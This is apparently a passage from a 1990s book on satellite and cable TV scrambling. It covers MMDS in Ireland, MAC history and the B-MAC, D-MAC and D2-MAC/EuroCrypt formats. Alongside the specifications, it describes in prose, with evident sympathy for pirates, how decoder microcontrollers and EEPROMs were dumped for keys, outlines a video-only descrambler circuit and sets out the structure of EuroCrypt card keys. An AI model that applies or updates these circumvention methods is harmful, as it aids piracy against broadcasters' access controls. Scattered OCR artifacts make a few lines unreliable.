illegally on UHF are still in existence. This is primarily due to some amazing 
events in 1994. The current, (at the time of writing), Prime Minister, John 
Bruton had no inkling that his Fine Gael party was going to be in a coalition 
government within a few weeks. He was at a meeting of rebeam operators 
in Cork and he was promising them that he would, if his party ever got back 
into power again, look at the situation of the illegality of rebeam operations. 
Of course at that time his party did not seem to have a remote chance of 
getting back into power. 


An unfortunate set of events led to the collapse of the Fianna Fail-Labour 
coalition government and Mr Bruton's party entered into coalition. The 
rebeam operators then brought up the matter of the speech he had made a 
few weeks just before. Mr Bruton, being a man of his word, was apparently 
bound to examine the situation. The result is that the situation is not 
resolved yet. The rebeam operators are still in operation and so are the 
MMDS operators. The superior service from the MMDS operations is 
winning more subscribers. 


In most implementations of MMDS in Ireland, the downconverter and the 
descrambler are two separate units. At this stage, no manufacturer has 
marketed an Integrated Downconverter Descrambler,(IDD). The majority of 
the downconverters seem to be cheap Taiwanese models. There are some 
good ones but the overriding concern for most cable companies is cost. 


The option of developing a hacker downconverter is an attractive one 
especially to anyone with amateur radio experience. However the risks of 
being caught are high. 


The main systems that are being used to scramble MMDS signals are 
baseband type systems. RF based systems such as synch suppressed 
systems are not usually permitted and are generally a bad choice due to the 
fact that most of them are compromised already. The signal transmitted on 
MMDS has to be standard PAL. This would leave Discret, Syster and 
Cryptovision as the only realistic options. VideoCrypt-S might actually be an 
option for some of the smaller cablenets as the VideoCrypt-S decoders are 
now on sale for as little as £5 per box after the collapse of the BBC Select 
service. A pirate smart card design could easily be pressed into service. 


However these two of these systems are not secure. Discret has been 
hacked since the early eighties. It has been in use on satellite during that 
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period and the designs for a pirate descrambler are readily available. Indeed 
they are given as a case study in Chapter 3. 


Cryptovision is apparently hacked as well though there is a catch that has 
prevented any large scale damage to the networks. This system is used on 
Cablelink, the biggest cable and MMDS operator in Ireland. This gives it a 
potential user base of over 400,000. 


However Cablelink only scramble the premium channels and the decoders 
are expensive. The only source for them at the moment in Ireland is, 
naturally, Cablelink. 


The cost of the official decoder, over £150, means that hackers are not that 
keen to purchase a decoder to watch Sky Sports and the Sky movie 
channels. Especially when the full Sky package can be hacked on satellite 
with a pirate smart card costing around £200. 


Naturally this edge will be lost over the next few years. No doubt on the 
advice of some clueless consultants, who only know about finance, they will 
introduce blanket scrambling. This will mean that everyone on the Cablelink 
cablenets will require a decoder. As a result piracy will flourish. 
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At a meeting in 1977, the World Administrative Radio Council, (WARC), 
formulated the guidelines for Direct Broadcast via Satellite. No transmission 
standard was recommended. A number of transmission standards were 
developed in the early eighties for DBS. The two front runners were 
Extended PAL, (E-PAL) and Multiplexed Analogue Component, (MAC). 
Fortunately DBS did not evolve as WARC 77 envisaged. In fact it would 
seem that the world just ignored the WARC. Considering that the main 
people involved were civil servants and members of monopoly PTTs that 
was probably a good thing. 


Their predictions were based on an LNC noise figure of 7 dB. The problem 
with technology in general is that things do not proceed at the orderly sedate 
pace of the mind of a bureaucrat. In technology, things move explosively as 
new developments renders huge swathes of equipment obsolete. This is 
exactly what happened with the WARC proposals. 


The dominant technology in microwave electronics at the time was silicon 
and the noise figures of the best transistors of the time were in the region of 
3 dB. But the advent of Gallium Arsenide (GaAs) technology allowed noise 
figures on transistors to drop below 1 dB. The effect on the WARC 
proposals was devastating. 


WARC had planned on satellite transponders with EIRPs of 64 dBw and 90 
cm dishes. What had become possible was that the lower power satellite 
transponders, with EIRPs in the region of 50 dBw could deliver the same 
performance with the lower noise figure equipment. 


However the governments in Europe had adopted the WARC specifications 
in their never ending vain battle against reality. They auctioned franchises 
for the right to broadcast using these frequency allocations and orbital slots. 
To some of us, it was like these governments were auctioning deckchairs 
on the Titanic and the news that the ship had sunk had not reached them. 


Closely following this questionable decision making pattern, the EC 
bureaucrats decided on the MAC system. It was a good system but it was 
the wrong answer from a technical point of view. Their motives were right. 
By choosing MAC, the EC put the Japanese at a disadvantage. European 
firms were in the lead in MAC technology as the patents were held by 
European firms. It seemed that the whole idea was that things would 
progress in an orderly linear fashion with the market being regulated by the 
EC. Markets seem to work on Chaos Theory and things that go bump in the 
night. 
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The elements of chaos were ASTRA and Rupert Murdoch's Sky Television 
venture. The ASTRA channels were primarily PAL based services. Sky 
launched in PAL and there was little that the UK government and their 
regulatory commissions could do about it. After all they were broadcasting 
from a non-UK satellite. The ensuing war between Sky and the government 
authorised service, British Satellite Broadcasting (BSB) nearly destroyed 
both companies but the D-MAC system was the ultimate victim. 


The whole BSB fiasco was just like a scene out of one of Douglas Adam's 
books. Specifically, it was like the scene where the stone age marketing 
executives sitting around trying to decide what colour to paint the wheel. 


In retrospect it seems even funnier. The old expression of not trying to 
reinvent the wheel could be applied here. These people not only tried to 
reinvent it but they made it square. At the first major press conference, their 
square antenna was made of wood. Then they came up with some utterly 
stupid advertising campaign about it being "hip to be square". Obviously 
their strength lay in that realm of self-deceit called advertising. 


So while they fiddled in their marble paved palace with expensive 
advertising campaigns, wooden antennae, and generally doing lunch 
meetings, their venture sputtered out. More precisely it was sold out in a 
backroom deal in a hotel in the UK. The first that the chief of BSB knew of 
this was when someone telephoned him to tell him that he was fired. The 
French have an expression that might be applied here - something about 
making an example. But what this event showed was that the satellite 
television business is no place for pompous rank amateurs. 


ASTRA and Sky had been first. To paraphrase an American Civil War 
Confederate soldier: "Who ever gets there first with the most wins". This 
time, Johnny Reb won. 


Throughout Europe, MAC did not fare well. It has seen sporadic use. The 
reunification of Germany meant that D2-MAC was not going to be accepted 
by German broadcasters. They preferred to operate in PAL. There were 
some disagreements about the system and protocols with the result that the 
whole unified approach to a European standard fragmented. 


Even their attempts to have a high definition digital television standard 
collapsed. Well it was heavily based on the D2-MAC standard. One thing 
should be very clear to these bureaucrats: the market creates standards. 
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The MAC system transmits the luminance and the chrominance separately. 
Both are time compressed. The compressed components are then trans- 
mitted sequentially. The components are expanded and combined to give 
YUV or RGB at the receiver using digital techniques. 


The compression of the video information allows greater depth for audio 
and teletext services. The line synch in the PAL system is transmitted as a 
pulse in each line. The pulse takes a considerable amount of the actual line 
time. With the MAC system, the line synch can be derived from a six bit 
synch word in the data block. 


MAC has a specific advantage over PAL when used in a satellite channel. In 
a frequency modulated system, the noise voltage to frequency response is 
triangular. The noise voltage rises almost linearly with frequency. In the PAL 
signal, the colour or chrominance information is mainly in the upper section 
of the baseband signal, (3.5MHz to 5.5MHz). As a result, the highest noise 
voltage appears in the chrominance producing a lower signal to noise ratio. 
Pre-emphasis only offers slight compensation for this effect. De-emphasis 
can have one disadvantage when dealing with a near threshold PAL signal. 
Dot sparklies become streak sparklies due to the response of the 
de-emphasis network. 


There is a number of MAC variants. Some of these variants have fallen into 
disuse. The most common variants in use are B-MAC, D-MAC and 
D2-MAC. C-MAC is still sporadically used. 


MAC Variants 


A-MAC 


This was the first version of the MAC family. The audio on this variant was 
on a 7.16 MHz subcarrier. It is not in use any more. It was essentially the 
prototype MAC system. 


B-MAC 


This version of MAC uses line delay as the video scrambling element. This 
is achieved by varying the length of the data packet. The data modulation 
format is 2-4 PSK. It is used by the AFRTS and the SIS Racing Channel. 


C-MAC 


This is the original EBU MAC specification. Frequency modulation was used 
for the video section of the line. Phase modulation was used for the data 
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D2-MAC 


DATA ) ( CHROMA \ LUMINANCE ! 





МАС offers о considerable saving іп the 
time taken for elements such as synch. 

In the PAL waveform, the synch occupies 

о major section of the line. The horizontal 
blanking takes up just over a fifth of the 
total line time. 


In the MAC signal, the chrominance is 
compressed by 3:1 nd the luminance is 
compressed by 2:1. This leaves the 1045 
synch area to be occupied with data. 


v Colour S/c 


parasena 





Colour Sidebands 


The noise in an frequency modulated PAL 
channel increases triangularly with 
frequency. As can be seen from the 
diagram, the noise is worst in the 
colour section of the spectrum. 


9-4 


9: Multiplexed Analogue Component 


packet. It require two demodulators at the receiver. Its bandwidth limited it to 
satellite broadcast use only. The 27 MHz required bandwidth was too large 
for cablenets. It has now largely fallen into disuse. 


D-MAC 


This system was used by the BSkyB, (previously British Satellite Broadcast- 
ing), satellite at 31 Degrees West. The D-MAC system can carry up to eight 
15 KHz audio channels. It uses duobinary encoding of the data to reduce 
the required bandwidth on a cablenet to approximately 10.5 MHz. 


This is still too wide for most European cablenets. This resulted in the 
D-MAC standard becoming a uniquely English standard. The rest of Europe 
chose D2-MAC. With the demise of BSB and the sale of the satellites, this 
standard has become obsolete. It was unfortunate as it is a relatively good 
implementation. However the whole BSB fiasco does show the dangers of 
clueless individuals and committees trying to dictate what the free market 
should have. 


The only good thing to come out of this fiasco was all of the BSB D-MAC 
IRDs which have been cheaply converted into D2-MAC EuroCrypt IRDs. 


D2-MAC 


This variant is a subset of D-MAC. It has half of the audio capacity of 
D-MAC. As a result, it can fit in a bandwidth of a cablenet channel of 8 MHz. 
This is the most widely used MAC variant. There is a number of standards 
used for encryption on D2-MAC; Eurocrypt-M, Eurocrypt-S, EuroCrypt-S2 
and EuroCrypt-S*. 


The D2-MAC variant is the standard and most widely used variant. Though 
it is largely used by Scandinavian channels, it has also been used in France 
by Canal Plus and Rendezvous. The security of the channels using it is poor 
as they seem to have ignored the relatively strong key handling procedures 
that would have resulted in greater security. The reason for its collapse is 
technological. 


S-MAC 


This variant is not used in broadcast applications due to the large 
bandwidth. It is also known as Studio MAC. The Y component is 
compressed by 2:1 and the U and V components by 4:1 respectively. This 
allows the multiplex to be carried on an ordinary PAL or NTSC line space 
complete with standard synch pulses. Its primary users are US studios. 
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Scientific Atlanta В-МАС 


Scientific Atlanta's B-MAC is currently in operation on the Europe's largest 
private network - the Satellite Information Services’ Racing Channel. The 
Racing Channel is supplied to a network of bookie’s shops. There are four 
users of the system, Ladbrokes, William Hill, Coral and Mecca. Each user 
has its own audio channel and the teletext service gives the results. 


British Telecom initially supplied the decoders and receivers to SIS. The 
decoders were recognisably Scientific Atlanta but there was some question 
as to the origin of the receivers. The receiver was reverse engineered and 
turned out to have been manufactured by JRC. Apparently a separate 
production line had been set up by JRC for these receivers. 


The receiver differed from other receivers of the period. The receiver's 
baseband had been widened to take the B-MAC signal and the baseband 
response had been widened to 10 MHz and the response had been 
smoothed. There was also an integrated receiver decoder version. 


There are two versions of B-MAC, the 625 version as used in Europe and 
Australia and the 525 version as used in the USA and Canada. The 
architecture of the decoders is similar and in most areas identical. The 
primary differences are in the system clock rate and the central microcon- 
troller. 


The main application of the B-MAC system appears to be narrowcasting 
rather than broadcasting. It is commonly used for high pay services such as 
sports events. It is also used on some of the intra-company video 
conferencing links. One of the factors in this has been the relatively high 
price of the decoder. 


In the United States and Canada, B-MAC has been mainly used on high pay 
services. The US variety has been totally hacked. It is possible to purchase 
replacement chips and out-boards that will give access to various high fee 
channels. 


Adverts for decoders capable of decoding the B-MAC encrypted channels 
accessible in Europe have appeared in the main satellite television 
magazines in Europe. The UK magazines “What Satellite” and “Satellite TV 
Europe” have carried news items and adverts for these modified decoders. 
It is a logical conclusion that the system is now totally compromised in 
Europe and North America. 


The B-MAC system is an old system. It reflects the scrambling technology 
of the mid eighties. Whereas the D2-MAC and D-MAC scrambling systems 
use cut and rotate, the B-MAC system uses a form of active line delay. In 
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light of developments in hacking, this type of scrambling is now woefully 
inadequate. 

It would be technically feasible to build a video only descrambler for under 
£200 using existing technology. With the horse racing channel, most 
prospective viewers would be satisfied with a black and white picture. The 
audio is sometimes available on radio links. 

The audio modulation is Adaptive Delta Modulation (Chapter 2). The digital 
audio and control data occupies the first 11 uS of the waveform. At the 
maximum, the data is 75 symbols wide and the minimum is 45 symbols 
wide. So by varying the amount of data in the waveform the starting position 
of the video is varied. 


The basic operation of the B-MAC system is similar to other MAC systems 
in that each line has three packets; data, chroma and luma. The time 
division multiplexer works in sample durations of 47nS. This roughly 
equates to 1365 samples per line (64 uS). D2-MAC differs from this in that it 
has only 1296 samples per line. 


The sample frequency and sample allocation for each B-MAC line is as 
follows: 

625 Line В-МАС 

Sample Clock Frequency: 21.328 MHz (est) 
Luminance: 750 Samples 35.165 uS 
Chrominance: 375 Samples 17.582 uS 
Luma-Chroma Transition: 6 Samples 0.281 uS 
Data: 234 Samples 10.971 uS 

525 Line B-MAC 

Sample Clock Frequency: 21.479 MHz 
Luminance: 750 Samples 34.918 uS 
Chrominance: 375 Samples 17.459 uS 
Luma-Chroma Transition: 6 Samples 0.279 uS 
Data: 234 Samples 10.894 uS 


Data Structure And Format 


The modulation format used is Differential Quadrature Phase Shift Keying, 
(DQPSK). This format is covered in Chapter 2 in the NICAM section. From 
this point on the values used are for 625 line B-MAC. 
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Each data symbol is three samples long. This results in a data block of 78 
symbols per line in the unscrambled format. The symbol rate is 455 * Line 
Frequency, or 7.109375 MegaSymbols per second. The typical rate is 1.22 
MegaSymbols per second. 


The six audio channels and the clock reference burst are transmitted in 
what would ordinarily be the horizontal blanking period in the PAL 
waveform. The 11 uS is occupied by the data symbols. 


Each symbol is a pair of bits in a four state modulation format. Twenty 
symbols are reserved for the clock reference burst. This is a two level signal 
and is ten cycles long. The frequency is 277.5 * Line Frequency or 
4.3359375 MHz. The average level of this data determines the zero 
chrominance level. 


Each data block consists of, 2 separation symbols, 45 symbols, 2 
separation symbols, 20 clock reference burst symbols, 2 separation 
symbols and 6 symbols. 


The audio channels are transmitted using the Dolby Deltalink system. This 
is the adaptive delta modulation system covered in Chapter 2. Each audio 
channel contributes thirteen samples and one control bit during each line 
period. The function of the control bit alternates with each line. The bit 
controls two things; the step size and the de-emphasis. Two error 
concealment bits and a parity bit are contained in each channel. The parity 
bit is used to check the six error concealment bits in each data block. A data 
channel is also provided for. Two bits are used for this service. The audio 
data rate is 204 Kb/s. 


The teletext is transmitted during the vertical blanking interval. The VBI is 
nominally twenty five lines long. In addition to VBI test waveforms, this 
period contains the teletext in packets of data each 377 symbols long. Lines 
9 to 13 carry the actual teletext packets. Lines 1 to 8 carry the subscriber 
address, the clock recovery data and the synch recovery data. The teletext 
is in ASCII format at a rate of forty characters per line. As the teletext 
service is valuable in its own right, it is encrypted. 


Access Control 


The access control system in the B-MAC decoder appears to be hierarchi- 
cal. Each decoder has an identity which is embedded in the decoder's 
microcontroller. This identity is used to decrypt the authorisation data and 
possibly the period keys. The period keys are then used to decrypt the 
session key or seeds. 
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There is a set of period keys which each decoder must have in order to 
properly decrypt the session keys. In the United States, some channels 
change the key set every Wednesday. The period keys are stored in 
EEPROM but merely a set of period keys will not make the decoder operate 
as a pirate decoder. 


The B-MAC encoder generates the encryption pattern based on a seed that 
can, if necessary, be changed every quarter of a second. This seed is then 
transmitted in an encrypted format in one of the packets in the VBI. In this 
respect B-MAC is similar to D2-MAC and its period key - session key - 
control word hierarchy. 


The actual cryptographical algorithm is similar to the Data Encryption 
Standard algorithm. It is perhaps based in part on the DES but due to the 
restrictions on exporting DES equipment, it would have had to have been 
significantly different than the DES. Therefore since there is not enough 
information on the algorithm, hackers have not approached it from this 
angle. The hardware avenue was much easier. 


B-MAC Hacks 


The B-MAC system is an old system. What was secure in the mid eighties is 
not secure now. The technology has advanced and so have the skills and 
resources of the hackers. 


One of the things that made the video section of B-MAC secure was that it 
was digitally compressed and it was in a non-standard format. The cost of 
video ADCs and DACs was relatively high. Therefore the reasoning was 
that hackers would not be able to afford to hack the video. More importantly 
the potential customers would not be able to afford the pirate video 
descramblers. 


The logic was good for a finite lifetime system. Unfortunately B-MAC is nota 
short lifetime system. When a company uses B-MAC it is in for the duration. 
The cost of the decoders is relatively high and therefore to re-equip the 
network would be costly. 


As the technology available to hackers progressed, B-MAC became a 
sitting target. While there was a policy of upgrading the technology, there 
were a lot of decoders in the field. Retrofitting these decoders would be a 
costly affair and most channels and services seemed to prefer to absorb the 
minimal piracy. 


The hacks on B-MAC fall into two classes the stand alone video hack and 
the hook hack. Of the two the most damaging is the hook hack. 
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The Hook Hack 


When the channels in the United States started to scramble with VideoCi- 
pher ІІ, B-MAC also came under examination. While the hack on В-МАС 
was not as simple as the VideoCipher 1! hack, it was hacked. At first, 
strange messages started to appear on American hacker bulletin boards. 
They mentioned the Zero Power Chip which was supposed to replace a chip 
in the B-MAC decoder. The replacement chip was supposed to provide 
descrambled video and audio. 


Apparently what had happened was that someone had figured out how to 
extract the identity from the B-MAC decoder's microcontroller. The micro- 
controller was supposedly secured but by some method it was possible to 
jam it and read the program. Scientific Atlanta had blown the read fuses. 
The microcontroller used in the 525 B-MAC decoders was the 68705. This 
is the EPROM version of the 6805 microcontroller. 


Of course the decoder needed the period keys to operate properly. The 
keys were being stored in the 1K EEPROM, the 9346. Initially, these keys 
were not being changed with any great frequency. Possession of these keys 
alone was not enough to make the decoder operate. The decoder had to be 
authorised and the authorisation data may have been stored in the RAM on 
the microcontroller. 


It is now possible to buy a 68705 reader. This piece of electronics will allow 
you to dump the contents of the B-MAC decoder's 68705. The more recent 
decoders use the 68HC11 microcontrollers. These microcontrollers do not 
have any reliable security anymore. The fact that the VideoCrypt decoders 
used the 68705 as the main secured microcontroller and the contents of this 
chip are widely available shows that the chip is not secure. The 68HC11 is 
also used in the pirate Nagra SECAM decoder. The contents of that 
microcontroller are also available. 


The Video Only Hack 


The weakness of the video section should be apparent. To descramble the 
video, a circuit to differentiate between data and video has to be built. 


By using the chroma reference level between the data burst and the 
chroma, the line stores can be triggered. This is the key to descrambling the 
video. The output of this circuit can be used to gate the video into a three 
line store. 


The video detection circuit is suggested because trying to determine the 
delay sequence may be difficult. As the data block is within preset limits, a 
window comparator could be used. 
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The line stores would be of different length. The first line stores would be a 
temporary memory for the line. The second line store would be the memory 
for the line being operated on. The contents of this line would be clocked 
into the third storage line at a slower frequency. This would digitally expand 
the video. The output of the third line store would then be fed to the digital to 
analogue video converter. 


Although B-MAC is the primary system for high fee applications there 
seems to have been few if any hacks. The incentive to hack it is there. 
Some hackers are frequently offered sums of over one thousand pounds for 
a pirate decoder. More often than not this is for a video only decoder. There 
have been a few video only decoders in Europe but these were built for 
personal rather than commercial use. 


The one thing that has worked in favour of the Racing Channel is that it is 
easier to go to the betting shop than to buy a decoder. In some cases, the 
service used by the betting shops could be rebroadcast. 


Since the Racing Channel is a specialised service, the demand breakdown 
is different from that of a movie channel. The main demand for pirate 
decoders comes from those actually involved in the racing business. These 
people have the money to pay but were unable to obtain the service from 
SIS. SIS have launched a lower cost version of their service using 
VideoCrypt. However it is a cut down service and people still want more. 


Examining the B-MAC decoder provided some problems. In the early days 
of the SIS Racing Channel, the decoders were hardwired into the mains 
supply. If the power went down the decoder had to be reauthorised. The 
procedure for this involved a telephone call to the authorisation centre in the 
UK. 


Any real examination had to be carried out when the decoder was powered 
up and authorised. This was the easy part. The cover was taken off the 
decoder. The cameras and oscilloscopes were ready. Then the photo- 
graphs were taken. Unfortunately electronic flashes were used. The voltage 
spike was picked up by the decoder circuitry and the decoder was reset. 
The flashes were quickly replaced by magnesium flash bulbs and the 
decoder was reauthorised. 


With the photographs, it was possible to start to draft a circuit diagram. 
Time was of the essence. The work could only be carried out when there 
were no punters about. The photographs were developed and the circuit 
diagrams were drafted. It was perhaps one of the most complex reverse 
engineering operations in Europe to that time. 
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The next stage of the operation was to source all of the components without 
arousing any suspicions. One of the worst mistakes that any hacker can 
make is to openly ask for information on a custom chip without any good 
backup story. 


The conclusion was that the only feasible method was to dump the secured 
microcontroller and the EEPROM. Dumping the EEPROM was the easy 
part. The EEPROM IC was a 9346. This is a 1K serial EEPROM. The 256 
bit version is used in mobile telephones to store the telephone's electronic 
serial number. A modified EPROM programmer copied this information. 
Unfortunately this was not enough. 


Some hackers noticed that there were barcodes on the back of the 
decoders. It may have been that the barcodes held the identification data of 
each decoder. The main problem was that the identity data was held in a 
secured microcontroller. 


Unlike the 525 B-MAC version, which used the 68705, the 625 B-MAC 
version used the 68HC11. According to some sources Scientific Atlanta 
considered the European hacking environment to be potentially more hostile 
than the USA. Of course the alternative explanation was that they had just 
marketed a more advanced version in Europe. 


The main European hacking work on B-MAC was carried out prior to the 
launch of ASTRA. The market was much smaller. The number of dish 
owners in Europe was quantified in thousands. There were some descram- 
blers being developed for FilmNet, Premiere the English movie channel, 
and BBC. The scrambling systems used at that time were analogue and 
descramblers were easy to build. 


When ASTRA was launched, the ease of hacking FilmNet created the 
biggest market satellite pirate descramblers. At the peak of the analogue 
market, at least 1.5 Million pirate FilmNet descramblers were in use in 
Europe. 


What must be worrying Scientific Atlanta is that the European market has 
changed and there are some hackers who are examining the feasibility of 
marketing a B-MAC video only decoder. With the pirate devices giving audio 
and video costing in the region of £900, a low cost video only decoder for 
the racing channel would probably be an economically viable pirate device. 
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The D-MAC Standard 


The D-MAC is effectively the English MAC standard. This is primarily 
because it was used on the UK's first and last high power DBS service. It is 
now basically a defunct standard which of course is a shame. It was a 
superior system to PAL625. It can carry eight 15 KHz audio channels or 
their equivalent in data services. 


D-MAC Specifications 
Number Of Lines Per Frame: 625 
Lines With Data: А11 
Video Lines: 24-310, 336-622 
Luminance: Y in each line 
Chrominance: U in odd lines, V in even lines 
Interlace: 2:1Aspect Ratio: 4:3 
Luminance Compression Ratio: 3:2 
Chrominance Compression Ratio: 3:1 
Sampling Clock Frequency: 20.25 MHz 
Instantaneous Bit Rate: 20.25 Mbits/second 
Samples Per Line: 1296 
Luminance Samples: 697 
Chrominance Samples: 349 


Bits Per Data Packet: 206 (1 Run in bit + 6 bit H synch word + 2 * 99 
bits data + 1 spare bit) 


Line 624: Data and analogue reference levels. 

Line 625: 648 data bits 

6 bits - horizontal synch word 32 bits - clock run-in 

64 bits - vertical synch word 546 bits - service information 


Data Structure And Format 


The data packets in the D-MAC signal contain the audio and the synch 
words. The synch word is 6 bits long. It is transmitted as 001011 and 
110100 in alternate lines. The vertical synch word is 64 bits long and is 
transmitted at the start of line 625. 


The video scrambling system used on the D-MAC signal is double cut and 
rotate. There is no difference between the scrambling used on D2-MAC and 
that used on D-MAC. This is a system whereby the chrominance and the 
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luminance packets are cut and rotated separately. The chrominance is cut 
at one of 256 points and the luminance is cut at one of 256 points. 


When the video is unscrambled, there is a rough video compatibility 
between D-MAC and D-2MAC. This is the reason that some users of 
unconverted BSB D-MAC / EuroCypher receivers can lock up other MAC 
transmissions but fail to decode their audio. 


The data on the D-MAC system in each frame amounts to 164 packets of 
751 bits each. These packets break down into a header, consisting of 23 
bits, a packet type, consisting of 8 bits and 720 bits of audio data or in some 
cases other data types. 


The header breakdown is as follows; Address - 10 bits; Continuity Index - 2 
Bits; and the Protection Suffix - 11 bits. 


The audio channels can be high quality CD types or medium quality types. 
The parameters for a high quality channel are 15 KHz bandwidth and 32 
KHz sampling frequency. The parameters for the medium type are 7 KHz 
bandwidth and a sampling frequency of 16 KHz. 


The audio channels have a choice of coding types - NICAM or Linear. The 
NICAM is the same as that used terrestrially. (See chapter 2). This is 
essentially a digital compression system where each 14 bit sample is 
digitally compressed to 10 bits. The linear type of coding uses a 14 bit 
sample without compression. 


The D2-MAC Standard 


The D2-MAC is effectively the European MAC standard for all that is worth. 
The European Commission made it so such at the behest of the MAC chip 
and decoder manufacturers. There was even the great quote from the then 
Commissioner Pandolfi about how he was taking advice from the main 
decoder manufacturers on the subject. Not exactly unbiased information. 
After this fiasco, it is difficult to take anything that the European Commission 
does in information technology seriously. 


However the whole idea of D2-MAC EuroCrypt-M as the European 
television standard collapsed as the market didn't bother taking any notice 
of these bureaucrats. And the bureaucrats did not understand that 
technology in the television market moves on what economics would term a 
long cycle. It can take ten years or more for a system to move into operation 
and replace an existing one. This is especially the case where the 
technology of the existing market is being replaced. These people wanted it 
to happen in the space of a few years. For the best example of this, observe 
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how the American market is still split between the C-Band systems and the 
smaller and more advanced digital systems. 

Of course such realities did not stop the European Commission. They had, 
after all, their unbiased advice which gave them a glowing picture of the 
future of MAC. The theory among hackers is that they were all just social 
scientists. The reality is that in retrospect they were just bureaucrats with 
some good intentions trying to help and protect European jobs and 
industries. 

The D2-MAC standard would have become a footnote in the history of 
satellite television had it not been for one thing - piracy. The fact that the 
main movie channels in Europe using the D2-MAC standard have been 
hacked continually for the last meant that there is a larger market for pirate 
cards in Europe than official cards. And each of those pirate cards requires 
a decoder or IRD. Thus piracy has created a thriving market in D2-MAC 
decoders. Even IRDs from the defunct BSB D-MAC venture are being 
converted to D2-MAC EuroCrypt. 

D2-MAC EuroCrypt can carry four 15 KHz audio channels. The primary 
advantage of the D2-MAC system over D-MAC is that it will fit in the 
bandwidth of an ordinary cablenet channel. 


D2-MAC Specifications 
Number Of Lines Per Frame: 625 
Lines With Data: А11 
Video Lines: 24-310, 336-622 
Luminance: Y in each line 
Chrominance: U іп odd lines, V in even lines 
Interlace: 2:1 
Aspect Ratio: 4:3 
Luminance Compression Ratio: 3:2 
Chrominance Compression Ratio: 3:1 
Sampling Clock Frequency: 20.25 MHz 
Instantaneous Bit Rate: 10.125 Mbits/second 
Samples Per Line: 1296 
Luminance Samples: 697 
Chrominance Samples: 349 
Bits Per Data Packet: 105 (99 bits 6 bit h synch word) 
Line 624: Data and analogue reference levels. 
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Line 625: 648 data bits 

6 bits - horizontal synch word 

32 bits - clock run-in 

64 bits - vertical synch word 546 bits - service information 


Data Structure And Format 


The data packets in the D2-MAC signal contain the audio and the synch 
words. The synch word is 6 bits long. It is transmitted as 001011 and 
110100 in alternate lines. The vertical synch word is 64 bits long and is 
transmitted at the start of line 625. 


The video scrambling system used on the D2-MAC signal is double cut and 
rotate. This is a system whereby the chrominance and the luminance 
packets are cut and rotated separately. The chrominance is cut at one of 
256 points and the luminance is cut at one of 256 points. This type of 
scrambling is also employed on the D-MAC signal. 


The Eurocrypt-M system was recommended standard for D2-MAC. This 
variant is the most widely used one on EuroCrypt. Other variants such as 
EuroCrypt-S and EuroCrypt-S2 are also used. 


It seems that the main areas of difference in the variants is in the handling 
of the control word decryption. The EuroCrypt-M variant uses ECB mode 
DES with the initial and inverse initial permutations removed. It encrypts the 
over the air data to generate the control word. The S variants tend to use the 
ECM mode DES with the initial and inverse initial permutations included. It 
decrypts the over the air data to generate the control word. 


The Eurocrypt M variant uses an 8 bit parallel interface between the Access 
Control Module and the D2-MAC decoder. It also allows the use of some 
sophisticated functions. 


The Eurocrypt S variant uses a 9600 Baud serial interface between the 
Access Control Module and the D2-MAC decoder circuitry. 


Most of the decoders on the market are capable of handling either of the 
variants. The demise of the BSB D-MAC venture left the market with a lot of 
very cheap IRDs that could easily be converted to D2-MAC EuroCrypt. As a 
result, there are many unofficial D2-MAC decoders on the market. This fact 
combined with the massive piracy on D2-MAC channels has perhaps given 
the D2-MAC EuroCrypt system a new lease of life. 


9-18 


9: Multiplexed Analogue Component 


The EuroCrypt-M System 


EuroCrypt-M is one of the scrambling system overlays used оп the D2-MAC 
standard. It is one of the most widely published systems. Most of the 
information in this section was gleaned from the official France Telecom 
specification. The main part of the information necessary to hack this 
scrambling system was therefore freely available. Of course the fact that 
they used a commonly available algorithm as their secret algorithm made 
things a lot easier. 


The sequence generator used for descrambling the video and audio data is 
a Pseudo Random Binary Sequence Generator PRBSG. The PRBSG is 
reset with a new seed or Control Word every 256 Frames. The frame 
counter is eight bits wide. 


The system is based on the detachable secure processor philosophy. The 
smart card contains the critical information. The decoder is essentially a 
dumb terminal. 


The basic key structure is hierarchical. In many respects it is similar to the 
VideoCipher ІІ system including the fact that the encryption is based оп 
DES. The final key is a control word that is used to seed the PRBSG. 


The decoder itself is essentially dumb. It does contain the video and audio 
decryption circuitry but this requires the control word data from the card. 
Essentially, once the decoder has the control words flowing to it, it will 
continue to descramble the video and audio. This makes it possible to hack 
using the McCormac Hack using the internet if necessary since the control 
word changes every 10.24 seconds. 


The entitlement control and management messages flowing to the card 
have to be checksummed with a hash function. The hash function is 
resident in the card. The length of the hash is 64 bits. The hash function is a 
modified form of DES used in ECB mode. (see Chapter 6). 


This section is concerned with the weaknesses and hackability of the 
EuroCrypt system rather than the overall operation of the system. Therefore 
| will only concentrate on what was relevant to hack the system. 

The Card And Its Data Structure 

The smart card used on the EuroCrypt system is EPROM and the CPU is 
6805 based. It therefore it was easy to emulate using a similar microcontrol- 


ler. However the problem was that the 6805 type microcontrollers were just 
not secure enough or cheap enough for the pirate market. 
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The code was popped from the D2-MAC EuroCrypt cards. There are of 
course other theories such as a source inside France Telecom or 
elsewhere selling the code. It seems that these were the last desperate 
gasps by people in France Telecom and the channels to convince 
themselves that the pirates were not able to pop the cards. 


The card - decoder protocol conforms to the ISO 7816 specification 
concerning microprocessor based smart cards. The first version of the 
smart card was limited in operation. It contained 6K of ROM, 128 Bytes of 
RAM and 8K of EPROM. 


At this point in time both the EPROM types of card and the newer EEPROM 
types in operation on EuroCrypt-M channels have been compromised. 
When all of the excess architecture and data structures have been chipped 
away, there is really not that much to hacking the system. 


There are two types of entities on the card; the Service Entity and the Issuer 
Entity. 

The Service Entity 

This is the data relevant to the particular channel. It contains all of the 
information necessary to generate the control words from the over the air 


data. The information in the Service Entity breaks down into the following 
subsets. 


The Descriptor DESCR 


This section contains the programme provider identifier or PPID. This is the 
20 Bits that indicates that indicates the channel's identity. It also designates 
the types of access available, e.g. subscription, PPV, IPPV. It also includes 
a service lock which allows the Service Entity to be locked out. 


The Keys 


There are two types of keys, Management Keys and Operation Keys. The 
management keys are concerned with decrypting the entitlement control 
messages and other management data. The operation keys are used to 
compute the control words and are therefore the most critical. 


The Label 


This is merely a name for the channel, e.g. FilmNet, and is not actually used 
by the card for any purpose. The length of the label is 10 bytes. 


The Programme Provider User Address 


The PPUA is a four byte address that identifies the user in the channel's 
access control system. The first three bytes indicate the user's Shared 
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Address (SA) and the other byte indicates the user's position in the Shared 
Address block. This byte is designated the CUSTWP. Essentially this allows 
the users to be accessed and controlled in blocks of 256. 


The Geographical Code Address 


The GCA indicates the area that the user is in. Generally the GCA is used 
for geographical area blackout. This is also known as the Group Customer 
address. It is 32 bits in length and represents an eight digit hexadecimal 
coded number. The first three bytes are the Geographical Code, (GC). 
